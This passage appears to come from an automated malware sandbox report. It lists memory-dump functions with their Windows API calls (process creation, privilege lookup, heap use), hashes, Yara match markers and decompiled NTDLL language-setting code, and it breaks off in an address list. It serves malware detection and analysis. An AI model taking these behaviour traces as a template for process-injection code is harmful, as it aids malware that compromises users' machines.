Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FC6B

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FFBF

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FEDB

Memory Dump Source

Source File: 00000007.00000002.2355769826.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000007.00000002.2355764388.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355965991.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355971041.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355978469.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355985432.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2355990772.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2356042887.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0009A0A6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D
RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D

Strings

.z`, xrefs: 0009A08C, 0009A098

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: .z`
API String ID: 2488874121-1441809116
Opcode ID: 1c7fa2bf05a8e02e5a2cbdcc6446d60e51601032a5fbd43a6e3e730550dded87
Instruction ID: 9819d7b80323fa2472a7a1908f8a3da622f42862759b8e15c852d4e40293abe4
Opcode Fuzzy Hash: 1c7fa2bf05a8e02e5a2cbdcc6446d60e51601032a5fbd43a6e3e730550dded87
Instruction Fuzzy Hash: 2A01BCB5204245AFDB24EF68DC81DE73BA8FF86710B118659F84957213D230E924DBF2

Uniqueness

Uniqueness Score: -1.00%

Function 0009A062, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D

Strings

.z`, xrefs: 0009A08C, 0009A098

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 7b02fa801c8c18263089b0fdb054003c7a3dbe120f901e8281cca2cada6840af
Instruction ID: 654cfbc3924d1de729a60988ca4ef9e5a83681e81aa326182b4f43848a2d131c
Opcode Fuzzy Hash: 7b02fa801c8c18263089b0fdb054003c7a3dbe120f901e8281cca2cada6840af
Instruction Fuzzy Hash: 88E02BB42042458BDF11EF79C4C049B7F90FFC27107508959D89807207C631E52AD7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0009A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D

Strings

.z`, xrefs: 0009A08C, 0009A098

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: a7483037e4c1910e9d9a21d5e5a2e149c0cc1c863966a88349e8802865b111dc
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: F5E04FB12002086BDB14DF59CC45EE777ACEF88750F018554FD0857242C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 000882EC, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2c4901ad9d90cf49b447a2a0cb3059fe0be113974f37572f7b93cd664e313932
Instruction ID: eea096d63a63d82db7f5d6236d43be6ded4f8f4aa37f6918c104d5334485e770
Opcode Fuzzy Hash: 2c4901ad9d90cf49b447a2a0cb3059fe0be113974f37572f7b93cd664e313932
Instruction Fuzzy Hash: 4901F731A902287AFB20A6949C03FFE776CBB51F55F044119FF04FA1C2EAD86A0657E5

Uniqueness

Uniqueness Score: -1.00%

Function 000882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction ID: b15f46ee9257f5a5c87ffb515308c002f2a10d2124ddc5db4670f24c2034491f
Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction Fuzzy Hash: 9C018F31A802287AFB20B6949C43FFE776CAB51F51F044119FB04BA1C2EAD46A0657E6

Uniqueness

Uniqueness Score: -1.00%

Function 0009A139, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A134

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: cbace9784b4c5c69115f95d6b29b20dbf9f2434098dd3172a269402f586a0905
Instruction ID: 90cdb6f20c1f63dcc291910d105844b8f765ee9eb6624bc7f501218c95f4a81e
Opcode Fuzzy Hash: cbace9784b4c5c69115f95d6b29b20dbf9f2434098dd3172a269402f586a0905
Instruction Fuzzy Hash: 2C212CB6204208AFCB04DF98DC81EEB77ADAF8D714F158658F94D97242C630E811CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0009A0DD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A134

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: aded57e048a83174bf6eb08b08a4020a487c3f08d73a80ccfc7325e01c6f4d62
Instruction ID: 587cd5087be84d5f15eef11b67b04e0aca8131741a10bbc85270f34b3d7c0495
Opcode Fuzzy Hash: aded57e048a83174bf6eb08b08a4020a487c3f08d73a80ccfc7325e01c6f4d62
Instruction Fuzzy Hash: 0301EFB6204148ABCB04CF99DC80DEB7BA9AF8C610F158258FA4997202C630E8418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A134

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 4a9b53bd2a9bc7990f2f7393a3eeed257928f61c893ff4aa5ad3e931d0c8cf1f
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 4D01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0009A1C4, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A200

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 83b2e5b65fc40d4faf5e3e3f85a1d0ca80563a5644a53dae6e6252c0da40a7b6
Instruction ID: 47fff330e629ec17fce18636d9b151f9d963d5b90f4a866e799a8db90de7f54f
Opcode Fuzzy Hash: 83b2e5b65fc40d4faf5e3e3f85a1d0ca80563a5644a53dae6e6252c0da40a7b6
Instruction Fuzzy Hash: A1F03CB1604318ABCA14EF98DC86EE777A8EF89610F058559FD485B242D631E9208BE2

Uniqueness

Uniqueness Score: -1.00%

Function 00099FF6, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bdb174a416058f385ed756b209b00eaf675022cf5e88346bbdc4b5dd8548643d
Instruction ID: 741721a10ea9810ae2565437214cd999c66618a225b3e8d2f9291979d3cace59
Opcode Fuzzy Hash: bdb174a416058f385ed756b209b00eaf675022cf5e88346bbdc4b5dd8548643d
Instruction Fuzzy Hash: 66F082767002146FDB18EF94DC80EE7B36DEF84310F118669F9485B201D631E914C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: ec980586e866633e4aeb80c8be97deace24af98f09b0c5f3d0675f8f0a4febe8
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 80E012B1200208ABDB14EF99CC81EA777ACEF88650F118558BA086B242C630F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A200

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 4ff4872ce74a436925e1108b6439f3c92e3127fea3b99fbfc9c4cc2734285a84
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 55E01AB12002086BDB10DF49CC85EE737ADEF89650F018154BA0867242C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008F697, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6CB

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 91591e0e5a2100e108401558d0d7b3935e64152e9d17414de4029c2d422eefc2
Instruction ID: 582e923f86f5b67ee53e525bfc171a9acf80f288370268db9237adff3d3dabd3
Opcode Fuzzy Hash: 91591e0e5a2100e108401558d0d7b3935e64152e9d17414de4029c2d422eefc2
Instruction Fuzzy Hash: FCE0C2212503063BEB20BAB8DC02F7632897B14B14F084078F9C8DA2D3F996E4208751

Uniqueness

Uniqueness Score: -1.00%

Function 0008F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6CB

Memory Dump Source

Source File: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: 6417aeeebd7252583303f3220bff117056388d79c37cbfd200bc3d3567543684
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 22D0A7717903043BEA10FAA49C03F6632CD6B44B04F490074FA88D73C3E950E4014165

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01E38788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01E38788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E01E38460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01E1E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E01E3718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E01E38460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E01E3718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E01E38460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E01E38460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E01E38460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E01E3718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01E1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01E12340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E01E2E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01E1E2A8(_t322,  &_v68, _v16);
								if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E01E2E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01E1E2A8(_t322,  &_v68, _t236);
								if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E01E3718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01E1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01E12340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E01E2E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01E1E2A8(_v12,  &_v68, _v16);
							if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E01E2E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01E1E2A8(_t322,  &_v68, _t269);
							if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E01E3718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01E1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E01E12340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E01E2E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01E1E2A8(_v12,  &_v68, _v16);
						if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E01E2E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01E1E2A8(_t322,  &_v68, _t296);
						if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x01e38788
0x01e38788
0x01e38791
0x01e38794
0x01e38798
0x01e3879b
0x01e3879e
0x01e387a1
0x01e387a4
0x01e387a7
0x01e387aa
0x01e387af
0x01e81ad3
0x01e38b0a
0x01e38b0d
0x01e38b13
0x01e38b19
0x01e38b1f
0x01e38b25
0x01e38b2b
0x01e38b31
0x01e38b37
0x01e38b3d
0x01e38b46
0x01e38b46
0x01e387c6
0x01e387d0
0x01e81ae0
0x01e81ae6
0x01e81af8
0x01e81af8
0x01e81afd
0x01e81afe
0x01e81b01
0x01e81b06
0x01e81b06
0x01e387d6
0x01e387f2
0x01e387f7
0x01e38807
0x01e3880a
0x01e3880f
0x01e38810
0x01e38813
0x01e38818
0x01e38818
0x01e3882c
0x01e38831
0x01e38838
0x01e38908
0x01e38920
0x01e389f0
0x01e38a08
0x01e38af6
0x01e38af6
0x01e38af8
0x01e38afb
0x01e81beb
0x01e81beb
0x01e38b04
0x01e81bf8
0x01e81c0e
0x01e81c13
0x01e81c16
0x01e81c16
0x01e81bf8
0x00000000
0x01e38b04
0x01e38a0e
0x01e38a11
0x01e38a14
0x01e38a15
0x01e38a18
0x01e38a22
0x01e38b59
0x01e38a28
0x01e38a3c
0x01e38a3c
0x01e38a42
0x01e81bb0
0x01e81b11
0x01e81b11
0x00000000
0x01e38a48
0x01e38a51
0x01e38a5b
0x01e38a5e
0x01e38a61
0x01e38a69
0x01e38a69
0x01e38a6d
0x00000000
0x00000000
0x01e38a74
0x01e38a7c
0x01e38a7d
0x01e38a91
0x01e38a93
0x01e38a93
0x01e38a98
0x01e38a9b
0x01e38aa1
0x01e38aa1
0x01e38aa4
0x01e38aaa
0x01e38ab1
0x01e38ac5
0x01e38ac7
0x01e38ac7
0x01e38ac5
0x01e38ace
0x01e81bc9
0x01e81bce
0x01e81bd2
0x01e81bd2
0x01e38ad8
0x01e38aeb
0x01e38aeb
0x01e38af0
0x01e38af4
0x00000000
0x01e38af4
0x01e38a42
0x01e38926
0x01e38929
0x01e3892c
0x01e3892d
0x01e38930
0x01e38935
0x01e3893a
0x01e38b51
0x01e38940
0x01e38954
0x01e38954
0x01e3895a
0x01e81b63
0x00000000
0x01e38960
0x01e38969
0x01e38973
0x01e38976
0x01e38979
0x01e3897e
0x01e38981
0x01e38981
0x01e38986
0x00000000
0x00000000
0x01e81b6e
0x01e81b74
0x01e81b7b
0x01e81b8f
0x01e81b91
0x01e81b91
0x01e81b99
0x01e81b9c
0x01e81ba2
0x01e81ba2
0x01e3898c
0x01e38992
0x01e38999
0x01e389ad
0x01e81ba8
0x01e81ba8
0x01e389ad
0x01e389b6
0x01e389c8
0x01e389cd
0x01e389d0
0x01e389d0
0x01e389d6
0x01e389e8
0x01e389e8
0x01e389ed
0x00000000
0x01e389ed
0x01e3895a
0x01e3883e
0x01e38841
0x01e38844
0x01e38845
0x01e38848
0x01e3884d
0x01e38852
0x01e38b49
0x01e38858
0x01e3886c
0x01e3886c
0x01e38872
0x01e81b0e
0x00000000
0x01e38878
0x01e38881
0x01e3888b
0x01e3888e
0x01e38891
